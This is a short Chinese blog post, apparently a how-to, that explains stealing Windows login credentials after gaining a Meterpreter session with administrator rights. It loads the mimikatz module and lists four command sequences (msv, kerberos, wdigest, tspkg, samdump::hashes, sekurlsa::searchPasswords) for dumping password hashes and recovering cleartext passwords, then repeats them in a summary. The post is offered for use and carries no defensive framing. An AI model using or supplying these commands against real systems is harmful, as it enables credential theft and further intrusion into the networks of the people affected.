进去meterpreter后getuid一下

这获得系统管理员权限

开始

加载mimikatz模块

load mimikatz

加载成功.

第一种方法:

获取登录密码的hash值

msv

上面已经是得到hash值了. 下面算明文密码.

获取明文密码

kerberos

look...拿到登录的明文密码了.

第二种方法:

使用另一种方式获取哈希值

mimikatz_command -f samdump::hashes

根据上面的方式获取明文密码

mimikatz_command -f sekurlsa::searchPasswords

第三种方法:

Wdigest命令

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

wdigest

第四种方法:

tspkg命令

tspkg

总结

一、
load mimikatz #加载mimikatz
msv #获取hash值
kerberos #获取明文 二、
load mimikatz #加载mimikatz
wdigest #获取系统账户信息 三、
load mimikatz #加载mimikatz
tspkg #获取系统账户信息 四、
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords

最新文章

  1. 【读书笔记】《编程珠玑》第一章之位向量&位图
  2. CCF 模拟D 动态规划
  3. JS-改变页面的颜色(二)
  4. 应用python编写简单新浪微博应用(一)
  5. 非对称认证方式 可以用在 asp.net webapi 的安全机制里面
  6. JAVA+FlexPaper+OpenOffice+SWFTools文档预览
  7. Delphi XE5教程9:基本语法元素
  8. 【ruby on rail 项目之 VPS下载机】
  9. checked
  10. PCB Layout爬电距离、电气间隙的确定
  11. SSH整合例子
  12. 最通俗易懂的javascript变量提升
  13. Tomcat使用shutdown.bat关闭会将其他Tomcat关掉的问题
  14. es6中的...三个点
  15. Web 前端编程运维必备
  16. Karen and Coffee CodeForces - 816B (差分数组+预处理前缀和)
  17. CSS Flex布局整理
  18. python3之协程
  19. EL语言表达式 (一)【语法和特点】
  20. House Robber I & II & III

热门文章

  1. desktopForWin安装
  2. [源码解析] NVIDIA HugeCTR,GPU 版本参数服务器 --(1)
  3. Git简单介绍以及使用入门
  4. MySQL架构原理之体系架构
  5. Windows server 2012安装vm-tools遇到的问题
  6. XSS Challenge靶场练习
  7. [杂记]BrainFuck语言及编译器(c++实现)
  8. DHCPv4协议测试——信而泰网络测试仪实操
  9. 学习Spring5必知必会(6)~Spring DAO
  10. 【C#特性】 Attribute 应用